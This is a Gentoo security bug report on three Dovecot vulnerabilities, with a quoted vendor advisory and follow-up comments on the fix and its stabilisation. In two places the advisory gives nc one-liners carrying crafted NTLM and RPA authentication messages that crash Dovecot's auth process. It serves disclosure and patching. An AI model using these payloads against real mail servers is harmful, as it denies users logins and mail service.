Bug 736617 (CVE-2020-12100, CVE-2020-12673, CVE-2020-12674) - <net-mail/dovecot-2.3.11.3: multiple vulnerabilities (CVE-2020-{12100,12673,12674})
Summary: <net-mail/dovecot-2.3.11.3: multiple vulnerabilities (CVE-2020-{12100,12673,1...
Status: CONFIRMED
Alias: CVE-2020-12100, CVE-2020-12673, CVE-2020-12674
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
URL:
Whiteboard: B3 [stable cve glsa+]
Keywords: CC-ARCHES, STABLEREQ
Depends on: 739504
Blocks: CVE-2020-10957, CVE-2020-10958, CVE-2020-10967
Reported: 2020-08-10 12:35 UTC by Thomas Deutschmann
Modified: 2020-09-18 07:54 UTC

See Also:
Package list:
=net-mail/dovecot-2.3.11.3
Runtime testing required: ---
nattka: sanity-check+

Description Thomas Deutschmann gentoo-dev Security 2020-08-10 12:35:43 UTC
Incoming details.
Comment 1 Thomas Deutschmann gentoo-dev Security 2020-08-12 13:42:11 UTC
Open-Xchange Security Advisory 2020-08-12 

Affected product: Dovecot IMAP server 
Internal reference: DOP-1849 (Bug ID) 
Vulnerability type: Uncontrolled recursion (CWE-674) 
Vulnerable version: 2.0 
Vulnerable component: submission, lmtp, lda 
Fixed version: 2.3.11.3 
Report confidence: Confirmed 
Solution status: Fix available 
Vendor notification: 2020-04-23 
CVE reference: CVE-2020-12100 
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) 

Vulnerability Details: 
Receiving mail with deeply nested MIME parts leads to resource exhaustion as Dovecot attempts to parse it.

Risk: 
Malicious actor can cause denial of service to mail delivery by repeatedly sending mails with bad content.

Workaround: 
Limit MIME structures in MTA. 

Solution: 
Upgrade to fixed version. 


Affected product: Dovecot IMAP server 
Internal reference: DOP-1870 (Bug ID) 
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation) 
Vulnerable version: 2.2 
Vulnerable component: auth 
Fixed version: 2.3.11.3 
Report confidence: Confirmed 
Solution status: Fix available 
Vendor notification: 2020-05-03 
CVE reference: CVE-2020-12673 
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) 

Vulnerability Details: 
Dovecot's NTLM implementation does not correctly check message buffer 
size, which leads to reading past allocation which can lead to crash. 

Risk: 
An adversary can use this vulnerability to crash dovecot auth process 
repeatedly, preventing login. 

Steps to reproduce: 
(echo 'AUTH NTLM'; echo -ne 'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' | base64 -w0; echo; \
 echo -ne 'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00orange\x00' | base64 -w0; echo; \
 echo QUIT) | nc 127.0.0.1 110

Workaround: 
Disable NTLM authentication. 

Solution: 
Upgrade to fixed version. 


Affected product: Dovecot IMAP server 
Internal reference: DOP-1869 (Bug ID) 
Vulnerability type: CWE-126 (Buffer over-read) 
Vulnerable version: 2.2 
Vulnerable component: auth 
Fixed version: 2.3.11.3 
Report confidence: Confirmed 
Solution status: Fix available 
Vendor notification: 2020-05-03 
Researcher credit: Orange from DEVCORE team 
CVE reference: CVE-2020-12674 
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) 

Vulnerability Details: 
Dovecot's RPA mechanism implementation accepts zero-length message, which leads to assert-crash later on.

Risk: 
An adversary can use this vulnerability to crash dovecot auth process 
repeatedly, preventing login. 

Steps to reproduce: 
(echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo; \
 echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo; \
 echo QUIT) | nc 127.0.0.1 110

Workaround: 
Disable RPA authentication. 

Solution: 
Upgrade to fixed version.
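The CVE-2020-12100 workaround above says to limit MIME structures in the MTA. The following is an added example (not from the Gentoo bug, the Open-Xchange advisory, or Dovecot itself) of such a nesting-depth guard written with Python's standard email parser; the limit of 10 and the function names are assumptions, and the test message is constructed inline.

```python
# Added example, not part of the advisory or of Dovecot: reject messages whose
# multipart nesting exceeds a policy limit before a delivery agent parses them.
import email
from email import policy
from email.message import EmailMessage

MAX_MIME_DEPTH = 10  # assumed policy value, not a Dovecot setting


def mime_depth(msg, limit: int) -> int:
    """Deepest multipart nesting level (0 = no multipart), walked with an
    explicit stack so the check itself cannot blow the recursion limit.
    Stops early as soon as the limit is exceeded."""
    deepest = 0
    stack = [(msg, 0)]
    while stack:
        part, depth = stack.pop()
        deepest = max(deepest, depth)
        if deepest > limit:
            return deepest  # over budget already; skip the rest of the tree
        if part.is_multipart():
            stack.extend((child, depth + 1) for child in part.get_payload())
    return deepest


def mime_depth_ok(raw: bytes, limit: int = MAX_MIME_DEPTH) -> bool:
    """Parse raw RFC 5322 bytes and report whether nesting stays within limit."""
    try:
        msg = email.message_from_bytes(raw, policy=policy.default)
    except RecursionError:
        # The stdlib parser recurses once per nesting level, so a pathologically
        # deep message can exhaust the interpreter stack before we count it.
        # Treat that as a policy violation rather than an unhandled error.
        return False
    return mime_depth(msg, limit) <= limit


def nested_message(levels: int) -> bytes:
    """Construct a test message whose multipart/mixed parts nest `levels` deep."""
    inner = EmailMessage()
    inner.set_content("leaf part")
    for _ in range(levels):
        outer = EmailMessage()
        outer.make_mixed()
        outer.attach(inner)
        inner = outer
    inner["From"] = "sender@example.invalid"  # constructed sample addresses
    inner["To"] = "rcpt@example.invalid"
    inner["Subject"] = "nesting test"
    return inner.as_bytes()
```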
Comment 2 Larry the Git Cow gentoo-dev 2020-08-14 09:17:06 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4cffab4e4790734f6acdd76ca5d9112eb13ac019

commit 4cffab4e4790734f6acdd76ca5d9112eb13ac019
Author:     Eray Aslan <eras@gentoo.org>
AuthorDate: 2020-08-14 09:16:48 +0000
Commit:     Eray Aslan <eras@gentoo.org>
CommitDate: 2020-08-14 09:16:48 +0000

    net-mail/dovecot: security bump to 2.3.11.3
    
    Bug: https://bugs.gentoo.org/736617
    Package-Manager: Portage-3.0.2, Repoman-2.3.23
    Signed-off-by: Eray Aslan <eras@gentoo.org>

 net-mail/dovecot/Manifest                |   2 +
 net-mail/dovecot/dovecot-2.3.11.3.ebuild | 288 +++++++++++++++++++++++++++++++
 2 files changed, 290 insertions(+)
Comment 3 Eray Aslan gentoo-dev 2020-08-14 09:46:31 UTC
Arches, please test and mark stable
=net-mail/dovecot-2.3.11.3

Target Keywords = ~alpha amd64 arm ~hppa ~ia64 ~mips ppc ppc64 s390 ~sparc x86
Comment 4 Sam James gentoo-dev Security 2020-08-14 18:14:09 UTC
amd64 done
Comment 5 Sam James gentoo-dev Security 2020-09-05 03:55:39 UTC
ppc64 done
Comment 6 Thomas Deutschmann gentoo-dev Security 2020-09-05 23:47:18 UTC
x86 stable
Comment 7 Thomas Deutschmann gentoo-dev Security 2020-09-06 00:06:44 UTC
New GLSA request filed.
Comment 8 GLSAMaker/CVETool Bot gentoo-dev 2020-09-06 00:27:47 UTC
This issue was resolved and addressed in
 GLSA 202009-02 at https://security.gentoo.org/glsa/202009-02
by GLSA coordinator Thomas Deutschmann (whissi).
Comment 9 Thomas Deutschmann gentoo-dev Security 2020-09-06 00:28:17 UTC
Re-opening for remaining architectures.
Comment 10 Sam James gentoo-dev Security 2020-09-12 19:22:36 UTC
-r1 stabled for arm (with USE=unwind, all but dodgy backtrace tests pass).
Comment 11 Agostino Sarubbo gentoo-dev 2020-09-18 07:54:53 UTC
ppc stable